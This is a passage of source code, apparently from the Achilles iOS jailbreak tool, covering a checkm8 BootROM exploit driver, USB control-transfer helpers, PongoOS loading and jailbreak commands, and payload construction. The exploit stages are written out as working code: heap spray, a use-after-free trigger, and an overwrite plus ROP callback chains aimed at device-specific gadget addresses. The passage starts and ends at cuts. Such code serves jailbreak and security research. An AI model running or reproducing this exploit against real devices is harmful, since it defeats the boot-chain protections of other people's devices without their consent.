mode 73 | if (!place_device_into_recovery_mode(normal_device)) { 74 | LOG(LOG_ERROR, "Failed to place device into recovery mode!"); 75 | return false; 76 | } 77 | normal_device = NULL; 78 | // Don't break here, we want to wait for the device to enter recovery mode 79 | } else if (dfu_handle.device) { 80 | handle = &dfu_handle; 81 | LOG(LOG_INFO, "Found device in DFU mode!"); 82 | break; 83 | } else if (recovery_handle.device) { 84 | handle = &recovery_handle; 85 | LOG(LOG_INFO, "Found device in recovery mode!"); 86 | break; 87 | } else if (pongo_handle.device) { 88 | handle = &pongo_handle; 89 | break; 90 | } 91 | } 92 | } 93 | 94 | stopThreads = true; 95 | sleep_ms(200); // Let the threads stop 96 | stopThreads = false; 97 | 98 | if (handle->pid == 0x1281) { 99 | if (!get_device_into_dfu_mode(handle)) { return false; } 100 | handle->pid = 0x1227; // TODO: why is this not done automatically? 101 | LOG(LOG_INFO, "Device is now in DFU mode!"); 102 | } 103 | 104 | struct DeviceConfiguration deviceConfig; 105 | struct PayloadConfiguration payloadConfig; 106 | bool ret = false; 107 | int stage = STAGE_PREPARE; 108 | 109 | while (stage != STAGE_DONE && wait_usb_handle(handle)) { 110 | if (stage == STAGE_PREPARE) { 111 | char *serialNumber = get_usb_device_serial_number(handle); 112 | if (!serialNumber) { goto finished; } 113 | if (!checkm8_find_device_configuration_for_cpid(dfu_serial_number_get_cpid(serialNumber), &deviceConfig)) { goto finished; } 114 | if (!checkm8_find_payload_configuration_for_cpid(dfu_serial_number_get_cpid(serialNumber), &payloadConfig)) { goto finished; } 115 | if (dfu_serial_number_is_in_yolo_dfu(serialNumber)) { LOG(LOG_INFO, "Found device in Yolo DFU mode!"); stage = STAGE_PONGO; goto yolodfu; } 116 | if (device_serial_number_is_in_pongo_os(serialNumber) && args.jailbreak) { LOG(LOG_INFO, "Found device in PongoOS!"); stage = STAGE_JAILBREAK; goto pongo; } 117 | else if (device_serial_number_is_in_pongo_os(serialNumber)) { LOG(LOG_INFO, "Found device in PongoOS!"); return 0; } 118 | if (dfu_serial_number_is_pwned(serialNumber)) { LOG(LOG_ERROR, "Device is already pwned!"); return true; } 119 | if (!dfu_serial_number_is_in_dfu_mode(serialNumber)) { LOG(LOG_ERROR, "Device is not in DFU mode!"); return false; } 120 | free(serialNumber); 121 | stage = STAGE_RESET; 122 | } 123 | if (stage == STAGE_RESET) { 124 | LOG(LOG_VERBOSE, "Resetting device..."); 125 | ret = checkm8_reset(handle); 126 | LOG(ret ? LOG_VERBOSE : LOG_ERROR, "Reset %s.", ret ? "succeeded" : "failed"); 127 | stage = STAGE_HEAP_SPRAY; 128 | } 129 | else if (stage == STAGE_HEAP_SPRAY) { 130 | LOG(LOG_INFO, "Stage 1: heap spray"); 131 | ret = checkm8_heap_feng_shui(handle, &deviceConfig); 132 | LOG(ret ? LOG_VERBOSE : LOG_ERROR, "Heap spray %s.", ret ? "succeeded" : "failed"); 133 | stage = STAGE_TRIGGER; 134 | } 135 | else if (stage == STAGE_TRIGGER) { 136 | LOG(LOG_INFO, "Stage 2: trigger use-after-free"); 137 | ret = checkm8_trigger_UaF(handle, &deviceConfig); 138 | LOG(ret ? LOG_VERBOSE : LOG_ERROR, "Trigger %s.", ret ? "succeeded" : "failed"); 139 | stage = STAGE_PATCH; 140 | } 141 | else if (stage == STAGE_PATCH) { 142 | LOG(LOG_INFO, "Stage 3: payload execution"); 143 | ret = checkm8_send_overwrite_and_payload(handle, &deviceConfig, &payloadConfig, mode == MODE_PONGOOS); 144 | LOG(ret ? LOG_VERBOSE : LOG_ERROR, "Patching %s.", ret ? "succeeded" : "failed"); 145 | if (!ret) { goto finished; } 146 | stage = mode == MODE_PONGOOS && ret ? STAGE_PONGO : STAGE_DONE; 147 | close_usb_handle(handle); 148 | if (mode == MODE_PONGOOS) { 149 | sleep(3); 150 | LOG(LOG_INFO, "If your device is stuck on the Apple logo, please unplug and replug."); 151 | ret = wait_for_device_to_enter_yolo_dfu(handle); 152 | stage = ret ? STAGE_PONGO : STAGE_DONE; 153 | } 154 | } 155 | else if (stage == STAGE_PONGO) { 156 | yolodfu: 157 | LOG(LOG_INFO, "Sending PongoOS..."); 158 | ret = send_pongo_to_yolo_dfu(handle); 159 | stage = (ret && args.jailbreak) ? STAGE_JAILBREAK : STAGE_DONE; 160 | if (stage == STAGE_DONE) { goto finished; } 161 | } 162 | else if (stage == STAGE_JAILBREAK) { 163 | pongo: 164 | LOG(LOG_INFO, "Jailbreaking..."); 165 | ret = pongo_jailbreak(handle); 166 | goto finished; 167 | } 168 | 169 | if (stage != STAGE_JAILBREAK && stage != STAGE_DONE && stage != STAGE_PONGO) { reset_usb_handle(handle); } 170 | 171 | // If a stage fails, and it's not the reset stage, we should stop 172 | if (!ret && stage != STAGE_HEAP_SPRAY) { goto finished; } 173 | } 174 | finished: 175 | if (ret) { 176 | LOG(LOG_SUCCESS, "%s succeeded.", mode == MODE_PONGOOS ? "Booting PongoOS" : "Exploit"); 177 | } else { 178 | LOG(LOG_ERROR, "Exploit failed at stage %d!", stage == STAGE_PREPARE ? stage : stage - 1); 179 | } 180 | return ret; 181 | } -------------------------------------------------------------------------------- /src/usb/usb.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | void sleep_ms(unsigned ms) { 4 | struct timespec ts; 5 | ts.tv_sec = ms / 1000; 6 | ts.tv_nsec = (ms % 1000) * 1000000L; 7 | nanosleep(&ts, NULL); 8 | } 9 | 10 | void close_usb_handle(usb_handle_t *handle) { 11 | libusb_close(handle->device); 12 | libusb_exit(NULL); 13 | } 14 | 15 | void reset_usb_handle(usb_handle_t *handle) { 16 | libusb_reset_device(handle->device); 17 | } 18 | 19 | extern bool stopThreads; 20 | 21 | bool wait_usb_handle(usb_handle_t *handle) { 22 | if (stopThreads) { 23 | LOG(LOG_ERROR, "Thread stopped."); 24 | return false; 25 | } 26 | if(libusb_init(NULL) == LIBUSB_SUCCESS) { 27 | for(;;) { 28 | if((handle->device = libusb_open_device_with_vid_pid(NULL, handle->vid, handle->pid)) != NULL) { 29 | if(libusb_set_configuration(handle->device, 1) == LIBUSB_SUCCESS) { 30 | return true; 31 | } 32 | libusb_close(handle->device); 33 | } 34 | sleep_ms(USB_TIMEOUT); 35 | } 36 | } 37 | return false; 38 | } 39 | 40 | bool wait_usb_handle_with_timeout(usb_handle_t *handle, unsigned timeout) { 41 | unsigned totalTime = 0; 42 | if(libusb_init(NULL) == LIBUSB_SUCCESS) { 43 | for(;;) { 44 | if((handle->device = libusb_open_device_with_vid_pid(NULL, handle->vid, handle->pid)) != NULL) { 45 | if(libusb_set_configuration(handle->device, 1) == LIBUSB_SUCCESS) { 46 | return true; 47 | } 48 | libusb_close(handle->device); 49 | } 50 | sleep_ms(USB_TIMEOUT); 51 | totalTime += USB_TIMEOUT; 52 | if (totalTime >= timeout) { 53 | return false; 54 | } 55 | } 56 | } 57 | return false; 58 | } 59 | 60 | void usb_async_callback(struct libusb_transfer *transfer) { 61 | *(int *)transfer->user_data = 1; 62 | } 63 | 64 | bool send_usb_control_request_no_timeout(const usb_handle_t *handle, uint8_t bmRequestType, uint8_t bRequest, uint16_t wValue, uint16_t wIndex, void *pData, size_t wLength, transfer_ret_t *transferRet) { 65 | int ret = libusb_control_transfer(handle->device, bmRequestType, bRequest, wValue, wIndex, pData, (uint16_t)wLength, 0); 66 | 67 | if(transferRet != NULL) { 68 | if(ret >= 0) { 69 | transferRet->sz = (uint32_t)ret; 70 | transferRet->ret = USB_TRANSFER_OK; 71 | } else if(ret == LIBUSB_ERROR_PIPE) { 72 | transferRet->ret = USB_TRANSFER_STALL; 73 | } else { 74 | transferRet->ret = USB_TRANSFER_ERROR; 75 | } 76 | } 77 | return true; 78 | } 79 | 80 | bool send_usb_control_request(const usb_handle_t *handle, uint8_t bmRequestType, uint8_t bRequest, uint16_t wValue, uint16_t wIndex, void *pData, size_t wLength, transfer_ret_t *transferRet) { 81 | int ret = libusb_control_transfer(handle->device, bmRequestType, bRequest, wValue, wIndex, pData, (uint16_t)wLength, USB_TIMEOUT); 82 | 83 | if(transferRet != NULL) { 84 | if(ret >= 0) { 85 | transferRet->sz = (uint32_t)ret; 86 | transferRet->ret = USB_TRANSFER_OK; 87 | } else if(ret == LIBUSB_ERROR_PIPE) { 88 | transferRet->ret = USB_TRANSFER_STALL; 89 | } else { 90 | transferRet->ret = USB_TRANSFER_ERROR; 91 | } 92 | } 93 | return true; 94 | } 95 | 96 | bool send_usb_control_request_async(const usb_handle_t *handle, uint8_t bmRequestType, uint8_t bRequest, uint16_t wValue, uint16_t wIndex, void *pData, size_t wLength, unsigned usbAbortTimeout, transfer_ret_t *transferRet) { 97 | struct libusb_transfer *transfer = libusb_alloc_transfer(0); 98 | struct timeval tv; 99 | int completed = 0; 100 | uint8_t *buf; 101 | 102 | if(transfer != NULL) { 103 | if((buf = malloc(LIBUSB_CONTROL_SETUP_SIZE + wLength)) != NULL) { 104 | if((bmRequestType & LIBUSB_ENDPOINT_DIR_MASK) == LIBUSB_ENDPOINT_OUT) { 105 | memcpy(buf + LIBUSB_CONTROL_SETUP_SIZE, pData, wLength); 106 | } 107 | libusb_fill_control_setup(buf, bmRequestType, bRequest, wValue, wIndex, (uint16_t)wLength); 108 | libusb_fill_control_transfer(transfer, handle->device, buf, usb_async_callback, &completed, USB_TIMEOUT); 109 | if(libusb_submit_transfer(transfer) == LIBUSB_SUCCESS) { 110 | tv.tv_sec = usbAbortTimeout / 1000; 111 | tv.tv_usec = (usbAbortTimeout % 1000) * 1000; 112 | while(completed == 0 && libusb_handle_events_timeout_completed(NULL, &tv, &completed) == LIBUSB_SUCCESS) { 113 | libusb_cancel_transfer(transfer); 114 | } 115 | if(completed != 0) { 116 | if((bmRequestType & LIBUSB_ENDPOINT_DIR_MASK) == LIBUSB_ENDPOINT_IN) { 117 | memcpy(pData, libusb_control_transfer_get_data(transfer), transfer->actual_length); 118 | } 119 | if(transferRet != NULL) { 120 | transferRet->sz = (uint32_t)transfer->actual_length; 121 | if(transfer->status == LIBUSB_TRANSFER_COMPLETED) { 122 | transferRet->ret = USB_TRANSFER_OK; 123 | } else if(transfer->status == LIBUSB_TRANSFER_STALL) { 124 | transferRet->ret = USB_TRANSFER_STALL; 125 | } else { 126 | transferRet->ret = USB_TRANSFER_ERROR; 127 | } 128 | } 129 | } 130 | } 131 | free(buf); 132 | } 133 | libusb_free_transfer(transfer); 134 | } 135 | return completed != 0; 136 | } 137 | 138 | void init_usb_handle(usb_handle_t *handle, uint16_t vid, uint16_t pid) { 139 | handle->vid = vid; 140 | handle->pid = pid; 141 | handle->device = NULL; 142 | } 143 | 144 | bool send_usb_bulk_upload(usb_handle_t *handle, void *buffer, size_t length) { 145 | int transferred; 146 | int interfaceRet = libusb_claim_interface(handle->device, 0); 147 | if (interfaceRet != LIBUSB_SUCCESS) { 148 | LOG(LOG_ERROR, "Failed to claim interface"); 149 | return -1; 150 | } 151 | int ret = libusb_bulk_transfer(handle->device, 0x2, buffer, length, &transferred, 100); 152 | if (ret == LIBUSB_ERROR_PIPE) { 153 | LOG(LOG_ERROR, "USB pipe error sending bulk upload"); 154 | } else if (ret == LIBUSB_ERROR_TIMEOUT) { 155 | LOG(LOG_ERROR, "USB timeout sending bulk upload"); 156 | } 157 | libusb_release_interface(handle->device, 0); 158 | return transferred == length; 159 | } 160 | 161 | 162 | bool send_usb_control_request_no_data(const usb_handle_t *handle, uint8_t bmRequestType, uint8_t bRequest, uint16_t wValue, uint16_t wIndex, size_t wLength, transfer_ret_t *transferRet) { 163 | bool ret = false; 164 | void *pData; 165 | 166 | if (wLength == 0) { 167 | ret = send_usb_control_request(handle, bmRequestType, bRequest, wValue, wIndex, NULL, 0, transferRet); 168 | } else if ((pData = malloc(wLength)) != NULL) { 169 | memset(pData, '\0', wLength); 170 | ret = send_usb_control_request(handle, bmRequestType, bRequest, wValue, wIndex, pData, wLength, transferRet); 171 | free(pData); 172 | } 173 | return ret; 174 | } 175 | 176 | bool send_usb_control_request_async_no_data(const usb_handle_t *handle, uint8_t bmRequestType, uint8_t bRequest, uint16_t wValue, uint16_t wIndex, size_t wLength, unsigned usbAbortTimeout, transfer_ret_t *transferRet) { 177 | bool ret = false; 178 | void *pData; 179 | 180 | if (wLength == 0) { 181 | ret = send_usb_control_request_async(handle, bmRequestType, bRequest, wValue, wIndex, NULL, 0, usbAbortTimeout, transferRet); 182 | } else if ((pData = malloc(wLength)) != NULL) { 183 | memset(pData, '\0', wLength); 184 | ret = send_usb_control_request_async(handle, bmRequestType, bRequest, wValue, wIndex, pData, wLength, usbAbortTimeout, transferRet); 185 | free(pData); 186 | } 187 | return ret; 188 | } 189 | 190 | static struct { 191 | uint8_t b_len, b_descriptor_type; 192 | uint16_t bcd_usb; 193 | uint8_t b_device_class, b_device_sub_class, b_device_protocol, b_max_packet_sz; 194 | uint16_t id_vendor, id_product, bcd_device; 195 | uint8_t i_manufacturer, i_product, i_serial_number, b_num_configurations; 196 | } usb_device_descriptor; 197 | 198 | char *get_usb_device_serial_number(usb_handle_t *handle) { 199 | transfer_ret_t transfer_ret; 200 | uint8_t buf[UINT8_MAX]; 201 | char *str = NULL; 202 | size_t i, sz; 203 | if (send_usb_control_request(handle, 0x80, 6, 1U << 8U, 0, &usb_device_descriptor, sizeof(usb_device_descriptor), &transfer_ret) 204 | && transfer_ret.ret == USB_TRANSFER_OK && transfer_ret.sz == sizeof(usb_device_descriptor) 205 | && send_usb_control_request(handle, 0x80, 6, (3U << 8U) | usb_device_descriptor.i_serial_number, 0x409, buf, sizeof(buf), &transfer_ret) 206 | && transfer_ret.ret == USB_TRANSFER_OK && transfer_ret.sz == buf[0] && (sz = buf[0] / 2) != 0 && (str = malloc(sz)) != NULL) { 207 | for (i = 0; i < sz; ++i) { 208 | str[i] = (char)buf[2 * (i + 1)]; 209 | } 210 | str[sz - 1] = '\0'; 211 | } 212 | return str; 213 | } 214 | 215 | -------------------------------------------------------------------------------- /src/pongo/pongo_helper.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | extern struct AchillesArgs args; 7 | 8 | // All credits go to @mineekdev for their openra1n project, 9 | // which provided the template for this code. 10 | 11 | bool prepare_pongo(unsigned char **pongoBuf, size_t *size) 12 | { 13 | size_t shellcodeSize, pongoSize; 14 | void *shellcode, *pongo; 15 | 16 | // The shellcode that is appended to the beginning of the 17 | // LZ4-compressed Pongo is actually an LZ4 decompressor 18 | // that decompresses the Pongo image into memory. 19 | // It is, in effect, a self-extracting payload. 20 | 21 | shellcodeSize = decompressor_shellcode_len; 22 | shellcode = malloc(shellcodeSize); 23 | memcpy(shellcode, decompressor_shellcode, shellcodeSize); 24 | 25 | 26 | // Get PongoOS 27 | if (args.pongoPath) { 28 | FILE *pongoFile; 29 | pongoFile = fopen(args.pongoPath, "rb"); 30 | if (pongoFile == NULL) 31 | { 32 | LOG(LOG_ERROR, "Failed to open PongoOS file (%s)", args.pongoPath); 33 | return false; 34 | } 35 | fseek(pongoFile, 0, SEEK_END); 36 | pongoSize = ftell(pongoFile); 37 | rewind(pongoFile); 38 | if (pongoSize >= 0x7fe00) { 39 | LOG(LOG_ERROR, "PongoOS is too large, must be less than 0x7fe00 bytes but is 0x%X bytes", pongoSize); 40 | return false; 41 | } 42 | pongo = malloc(pongoSize); 43 | fread(pongo, pongoSize, 1, pongoFile); 44 | fclose(pongoFile); 45 | } else { 46 | pongoSize = pongo_bin_len; 47 | pongo = malloc(pongoSize); 48 | memcpy(pongo, pongo_bin, pongoSize); 49 | } 50 | 51 | // Compress PongoOS 52 | char *pongoCompressed = malloc(pongoSize); 53 | LOG(LOG_VERBOSE, "Compressing PongoOS"); 54 | pongoSize = LZ4_compress_HC(pongo, pongoCompressed, pongoSize, pongoSize, LZ4HC_CLEVEL_MAX); 55 | if (pongoSize == 0) { 56 | LOG(LOG_ERROR, "Failed to compress PongoOS"); 57 | return false; 58 | } 59 | 60 | // Add shellcode to PongoOS 61 | LOG(LOG_VERBOSE, "Adding shellcode to PongoOS"); 62 | void *tmp = malloc(pongoSize + shellcodeSize); 63 | memcpy(tmp, shellcode, shellcodeSize); 64 | memcpy(tmp + shellcodeSize, pongoCompressed, pongoSize); 65 | free(pongo); 66 | pongo = tmp; 67 | pongoSize += shellcodeSize; 68 | free(shellcode); 69 | 70 | // Write size of compressed Pongo into data for decompressor 71 | uint32_t *pongoSizeInData = (uint32_t *)(pongo + 0x1fc); 72 | *pongoSizeInData = pongoSize - shellcodeSize; 73 | 74 | // Update parameters 75 | *pongoBuf = pongo; 76 | *size = pongoSize; 77 | 78 | return true; 79 | } 80 | 81 | int issue_pongo_command(usb_handle_t *handle, char *command, char *outBuffer) 82 | { 83 | bool ret; 84 | uint8_t inProgress = 1; 85 | uint32_t outPosition = 0; 86 | uint32_t outLength = 0; 87 | transfer_ret_t transferRet; 88 | char stdoutBuffer[0x2000]; 89 | if (command == NULL) goto fetch_output; 90 | size_t length = strlen(command); 91 | char commandBuffer[0x200]; 92 | if (length > (CMD_LENGTH_MAX - 2)) 93 | { 94 | LOG(LOG_ERROR, "Pongo command %s too long (max %d)", command, CMD_LENGTH_MAX - 2); 95 | return -1; 96 | } 97 | LOG(LOG_VERBOSE, "Executing PongoOS command: '%s'", command); 98 | snprintf(commandBuffer, 512, "%s\n", command); 99 | length = strlen(commandBuffer); 100 | ret = send_usb_control_request_no_data(handle, 0x21, 4, 1, 0, 0, NULL); 101 | if (!ret) 102 | goto bad; 103 | ret = send_usb_control_request_no_timeout(handle, 0x21, 3, 0, 0, commandBuffer, (uint32_t)length, NULL); 104 | fetch_output: 105 | while (inProgress) { 106 | ret = send_usb_control_request_no_timeout(handle, 0xA1, 2, 0, 0, &inProgress, (uint32_t)sizeof(inProgress), NULL); 107 | if (ret) { 108 | ret = send_usb_control_request_no_timeout(handle, 0xA1, 1, 0, 0, stdoutBuffer + outPosition, 0x1000, &transferRet); 109 | outLength = transferRet.sz; 110 | if (transferRet.ret == USB_TRANSFER_OK) { 111 | outPosition += outLength; 112 | if (outPosition > 0x1000) { 113 | memmove(stdoutBuffer, stdoutBuffer + outPosition - 0x1000, 0x1000); 114 | outPosition = 0x1000; 115 | } 116 | } 117 | } 118 | if (transferRet.ret != USB_TRANSFER_OK) { 119 | goto bad; 120 | } 121 | } 122 | bad: 123 | if (transferRet.ret != USB_TRANSFER_OK) 124 | { 125 | if (!strncmp("boot", command, 4)) { 126 | return 0; 127 | } else if (command != NULL) { 128 | LOG(LOG_ERROR, "USB transfer error: 0x%x, wLength out 0x%x.", transferRet.ret, transferRet.sz); 129 | return transferRet.ret; 130 | } else { 131 | return -1; 132 | } 133 | } 134 | else { 135 | if (outBuffer) { 136 | memcpy(outBuffer, stdoutBuffer, outPosition); 137 | } 138 | return ret; 139 | } 140 | } 141 | 142 | bool upload_file_to_pongo(usb_handle_t *handle, const char *path) { 143 | struct stat st; 144 | if (stat(path, &st) != 0) { 145 | LOG(LOG_ERROR, "Failed to stat %s.", path); 146 | return false; 147 | } 148 | if (S_ISDIR(st.st_mode)) { 149 | LOG(LOG_ERROR, "%s is a directory.", path); 150 | return false; 151 | } 152 | 153 | size_t length = st.st_size; 154 | // TODO: Size sanity check? 155 | 156 | int fd = open(path, O_RDONLY); 157 | if (fd < 0) { 158 | LOG(LOG_ERROR, "Failed to open %s.", path); 159 | return false; 160 | } 161 | char *buffer = malloc(length); 162 | if (buffer == NULL) { 163 | LOG(LOG_ERROR, "Failed to allocate buffer for %s.", path); 164 | return false; 165 | } 166 | if (read(fd, buffer, length) != length) { 167 | LOG(LOG_ERROR, "Failed to read %s.", path); 168 | return false; 169 | } 170 | 171 | LOG(LOG_VERBOSE, "Uploading %s to PongoOS...", path); 172 | 173 | bool ret = false; 174 | transfer_ret_t transferRet; 175 | ret = send_usb_control_request(handle, 0x21, DFU_DNLOAD, 0, 0, (unsigned char *)&length, 4, &transferRet); 176 | if (transferRet.ret == USB_TRANSFER_OK) { 177 | ret = send_usb_bulk_upload(handle, buffer, length); 178 | } 179 | 180 | close(fd); 181 | free(buffer); 182 | return ret; 183 | } 184 | 185 | char *append_boot_arguments(const char *base, const char *extra) { 186 | char *newBootArgs = malloc(strlen(base) + strlen(extra) + 1); 187 | if (newBootArgs == NULL) { 188 | LOG(LOG_ERROR, "Failed to allocate memory for boot arguments."); 189 | return NULL; 190 | } 191 | sprintf(newBootArgs, "%s %s", base, extra); 192 | return newBootArgs; 193 | } 194 | 195 | bool pongo_jailbreak(usb_handle_t *handle) { 196 | issue_pongo_command(handle, "fuse lock", NULL); 197 | issue_pongo_command(handle, "sep auto", NULL); 198 | 199 | // Upload kernel patchfinder 200 | if (!upload_file_to_pongo(handle, args.kpfPath)) { 201 | LOG(LOG_ERROR, "Failed to upload kernel patchfinder."); 202 | return false; 203 | } 204 | issue_pongo_command(handle, "modload", NULL); 205 | 206 | // Upload ramdisk 207 | if (args.ramdiskPath) { 208 | if (!upload_file_to_pongo(handle, args.ramdiskPath)) { 209 | LOG(LOG_ERROR, "Failed to upload ramdisk."); 210 | return false; 211 | } 212 | issue_pongo_command(handle, "ramdisk", NULL); 213 | } 214 | 215 | // Upload overlay 216 | if (args.overlayPath) { 217 | if (!upload_file_to_pongo(handle, args.overlayPath)) { 218 | LOG(LOG_ERROR, "Failed to upload overlay."); 219 | return false; 220 | } 221 | issue_pongo_command(handle, "overlay", NULL); 222 | } 223 | 224 | // Set boot arguments 225 | char *bootArgs = "xargs"; 226 | if (args.jailbreak && args.ramdiskPath) { 227 | char *newBootArgs = append_boot_arguments(bootArgs, "rootdev=md0"); 228 | if (newBootArgs == NULL) return false; 229 | bootArgs = newBootArgs; 230 | } 231 | if (args.verboseBoot) { 232 | char *newBootArgs = append_boot_arguments(bootArgs, "-v"); 233 | if (newBootArgs == NULL) return false; 234 | bootArgs = newBootArgs; 235 | } 236 | if (args.serialOutput) { 237 | char *newBootArgs = append_boot_arguments(bootArgs, "serial=3"); 238 | if (newBootArgs == NULL) return false; 239 | bootArgs = newBootArgs; 240 | } 241 | if (args.bootArgs) { 242 | char *newBootArgs = append_boot_arguments(bootArgs, args.bootArgs); 243 | if (newBootArgs == NULL) return false; 244 | bootArgs = newBootArgs; 245 | } 246 | if (args.bootArgs || args.ramdiskPath || args.verboseBoot || args.serialOutput) { 247 | issue_pongo_command(handle, bootArgs, NULL); 248 | } 249 | 250 | // Extra fix for verbose boot 251 | if (strstr(bootArgs, "-v")) { 252 | issue_pongo_command(handle, "xfb", NULL); 253 | } 254 | 255 | // Boot 256 | issue_pongo_command(handle, "bootx", NULL); 257 | 258 | // Done 259 | return true; 260 | } 261 | -------------------------------------------------------------------------------- /src/exploit/payload.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | uint8_t *create_gaster_overwrite_for_device(struct DeviceConfiguration *deviceConfig, struct PayloadConfiguration *payloadConfig, size_t *overwriteSize) { 4 | if (deviceConfig->cpid == 0x7000 || deviceConfig->cpid == 0x7001 || deviceConfig->cpid == 0x8000 || deviceConfig->cpid == 0x8003) { 5 | checkm8_overwrite_t checkm8Overwrite; 6 | memset(&checkm8Overwrite, 0, sizeof(checkm8_overwrite_t)); 7 | checkm8Overwrite.callback.callback = payloadConfig->insecureMemoryBase; 8 | *overwriteSize = sizeof(checkm8Overwrite); 9 | uint8_t *overwrite = malloc(*overwriteSize); 10 | memcpy(overwrite, &checkm8Overwrite, *overwriteSize); 11 | return overwrite; 12 | } else { 13 | checkm8_overwrite_t checkm8Overwrite; 14 | memset(&checkm8Overwrite, 0, sizeof(checkm8_overwrite_t)); 15 | checkm8Overwrite.callback.callback = payloadConfig->nopGadget; 16 | checkm8Overwrite.callback.next = payloadConfig->insecureMemoryBase; 17 | checkm8Overwrite.heap_pad_0 = 0xF7F6F5F4F3F2F1F0; 18 | checkm8Overwrite.heap_pad_1 = 0xFFFEFDFCFBFAF9F8; 19 | *overwriteSize = sizeof(checkm8Overwrite); 20 | uint8_t *overwrite = malloc(*overwriteSize); 21 | memcpy(overwrite, &checkm8Overwrite, *overwriteSize); 22 | return overwrite; 23 | } 24 | return NULL; 25 | } 26 | 27 | size_t generate_usb_rop_callbacks(uint8_t *buffer, uint64_t address, callback_t *callbacks, size_t callbackCount, struct PayloadConfiguration *payloadConfig) { 28 | uint8_t block0[MAX_BLOCK_SIZE], block1[MAX_BLOCK_SIZE]; 29 | size_t i, j, sz = 0, block0Size, block1Size; 30 | uint64_t reg; 31 | 32 | for(i = 0; i < callbackCount; i += 5) { 33 | block1Size = block0Size = 0; 34 | for(j = 0; j < 5; ++j) { 35 | address += MAX_BLOCK_SIZE / 5; 36 | if(j == 4) { 37 | address += MAX_BLOCK_SIZE; 38 | } 39 | if(i + j < callbackCount - 1) { 40 | reg = payloadConfig->functionGadget; 41 | memcpy(block0 + block0Size, ®, sizeof(reg)); 42 | block0Size += sizeof(reg); 43 | reg = address; 44 | memcpy(block0 + block0Size, ®, sizeof(reg)); 45 | block0Size += sizeof(reg); 46 | reg = callbacks[i + j].arg; 47 | memcpy(block1 + block1Size, ®, sizeof(reg)); 48 | block1Size += sizeof(reg); 49 | reg = callbacks[i + j].func; 50 | memcpy(block1 + block1Size, ®, sizeof(reg)); 51 | block1Size += sizeof(reg); 52 | } else if(i + j == callbackCount - 1) { 53 | reg = payloadConfig->functionGadget; 54 | memcpy(block0 + block0Size, ®, sizeof(reg)); 55 | block0Size += sizeof(reg); 56 | reg = 0; 57 | memcpy(block0 + block0Size, ®, sizeof(reg)); 58 | block0Size += sizeof(reg); 59 | reg = callbacks[i + j].arg; 60 | memcpy(block1 + block1Size, ®, sizeof(reg)); 61 | block1Size += sizeof(reg); 62 | reg = callbacks[i + j].func; 63 | memcpy(block1 + block1Size, ®, sizeof(reg)); 64 | block1Size += sizeof(reg); 65 | } else { 66 | reg = 0; 67 | memcpy(block0 + block0Size, ®, sizeof(reg)); 68 | block0Size += sizeof(reg); 69 | reg = 0; 70 | memcpy(block0 + block0Size, ®, sizeof(reg)); 71 | block0Size += sizeof(reg); 72 | } 73 | } 74 | memcpy(buffer + sz, block0, block0Size); 75 | sz += block0Size; 76 | memcpy(buffer + sz, block1, block1Size); 77 | sz += block1Size; 78 | } 79 | return sz; 80 | } 81 | 82 | #include 83 | #include 84 | #include 85 | 86 | uint8_t *create_gaster_payload_for_device(struct DeviceConfiguration *deviceConfig, struct PayloadConfiguration *payloadConfig, size_t *payloadSize) { 87 | 88 | struct { 89 | uint64_t pwnd[2], payload_dest, dfu_handle_bus_reset, dfu_handle_request, payload_off, payload_sz, memcpy_addr, gUSBSerialNumber, usb_create_string_descriptor, usb_serial_number_string_descriptor, ttbr0_vrom_addr, patch_addr; 90 | } A9; 91 | struct { 92 | uint64_t pwnd[2], payload_dest, dfu_handle_bus_reset, dfu_handle_request, payload_off, payload_sz, memcpy_addr, gUSBSerialNumber, usb_create_string_descriptor, usb_serial_number_string_descriptor, patch_addr; 93 | } notA9; 94 | struct { 95 | uint64_t handle_interface_request, insecure_memory_base, exec_magic, done_magic, memc_magic, memcpy_addr, usb_core_do_transfer; 96 | } handle_checkm8_request; 97 | callback_t callbacks[] = { 98 | { payloadConfig->ttbr0Write, payloadConfig->insecureMemoryBase }, 99 | { payloadConfig->tlbi, 0 }, 100 | { payloadConfig->insecureMemoryBase + ARM_16K_TT_L2_SIZE + payloadConfig->ttbr0SRAMOffset + 2 * sizeof(uint64_t), 0 }, 101 | { payloadConfig->ttbr0Write, payloadConfig->ttbr0Address }, 102 | { payloadConfig->tlbi, 0 }, 103 | { payloadConfig->retGadget, 0 } 104 | }; 105 | size_t data_sz, payload_sz, request_handler_payload_size; 106 | uint8_t *data, *payload, *request_handler_payload; 107 | uint64_t reg; 108 | 109 | if (deviceConfig->cpid == 0x8000 || deviceConfig->cpid == 0x8003) { 110 | if (payload_A9_len > sizeof(A9)) { 111 | payload = malloc(payload_A9_len); 112 | memcpy(payload, payload_A9, payload_A9_len); 113 | payload_sz = payload_A9_len - sizeof(A9); 114 | } else { 115 | payload = NULL; 116 | payload_sz = 0; 117 | } 118 | } else if (deviceConfig->cpid >= 0x7000 && deviceConfig->cpid <= 0x8015) { 119 | if (payload_notA9_len > sizeof(notA9)) { 120 | payload = malloc(payload_notA9_len); 121 | memcpy(payload, payload_notA9, payload_notA9_len); 122 | payload_sz = payload_notA9_len - sizeof(notA9); 123 | } else { 124 | payload = NULL; 125 | payload_sz = 0; 126 | } 127 | } else { 128 | payload = NULL; 129 | payload_sz = 0; 130 | LOG(LOG_ERROR, "Failed to prepare payload for device with CPID 0x%x.", deviceConfig->cpid); 131 | } 132 | 133 | if (payload != NULL) { 134 | if (payload_handle_checkm8_request_len > sizeof(handle_checkm8_request)) { 135 | request_handler_payload = malloc(payload_handle_checkm8_request_len); 136 | memcpy(request_handler_payload, payload_handle_checkm8_request, payload_handle_checkm8_request_len); 137 | request_handler_payload_size = payload_handle_checkm8_request_len - sizeof(handle_checkm8_request); 138 | if (deviceConfig->cpid == 0x8000 || deviceConfig->cpid == 0x8003) { 139 | data = calloc(1, payload_sz + sizeof(A9) + request_handler_payload_size + sizeof(handle_checkm8_request)); 140 | } else if (deviceConfig->cpid == 0x7000 || deviceConfig->cpid == 0x7001) { 141 | data = calloc(1, payload_sz + sizeof(notA9) + request_handler_payload_size + sizeof(handle_checkm8_request)); 142 | } else { 143 | data = calloc(1, DFU_MAX_TRANSFER_SIZE + payload_sz + sizeof(notA9) + request_handler_payload_size + sizeof(handle_checkm8_request)); 144 | } 145 | } else { 146 | request_handler_payload = NULL; 147 | request_handler_payload_size = 0; 148 | data = NULL; 149 | return NULL; 150 | } 151 | 152 | if (data != NULL) { 153 | 